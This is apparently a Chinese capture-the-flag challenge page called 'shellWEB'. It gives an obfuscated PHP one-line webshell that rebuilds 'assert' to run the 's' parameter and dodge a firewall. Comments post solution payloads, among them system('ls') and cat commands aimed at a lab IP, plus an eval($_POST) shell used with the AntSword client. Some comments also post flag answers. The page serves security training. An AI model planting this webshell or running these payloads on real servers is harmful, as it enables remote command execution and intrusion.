shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 4941
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
freestyle 18天前

s是传递的参数,get型号注入点,就是这么简单 ?s=system('ls')查看当前目录发现文件名,再通过cat、more、less、head、tail等查看文件内容

回复 0

我是CTF大王 21天前

http://114.67.175.224:16478/?s=system(%27ls%27) http://114.67.175.224:16478/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)

回复 0

我是CTF大王 21天前

http://114.67.175.224:16478/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)

回复 1

000ooo 25天前

?s=eval+($_POST['123'])

回复 1

ruien 1月前

答案就在描述里,上传的s参数如果是字符串会被当命令执行

回复 0

112356 1月前

flag{0aa5253236aa8d97368bd753cb3c4cf2}

回复 0

迷茫的三千面 1月前

flag{f790b1679ece8cfe8ce3fc425c30896b}

回复 0

星空 1月前

?s=eval($_POST["cmd"]),再用蚁剑连

回复 0

星空 1月前

?s=eval($_POST["cmd"])

回复 0

15824777912 2月前

flag{11393cf7e26fe81d89dc60b63d3a1f52}

回复 0

WriteUp

image
harry

3 金币

评分(6)

解题动态

yixcjy 攻破了该题 14分钟前
feifeifei1212 攻破了该题 2小时前
17530626785 攻破了该题 4小时前
DURUI 攻破了该题 5小时前
ntyz1919810 攻破了该题 23小时前
懒大王念你 攻破了该题 23小时前
jqr0630 攻破了该题 1天前
nbufe123 攻破了该题 1天前
dgreawSFD 攻破了该题 1天前
24030111073 攻破了该题 1天前
reaquedaue 攻破了该题 1天前
mffl 攻破了该题 2天前
0x2d3CN 攻破了该题 2天前
1870006529 攻破了该题 2天前
Xlj15562926857 攻破了该题 3天前
z19708684985 攻破了该题 3天前
当心眼睛 攻破了该题 3天前
ttmtmy01 攻破了该题 3天前
Gyro 攻破了该题 3天前
17632087155 攻破了该题 3天前
问题反馈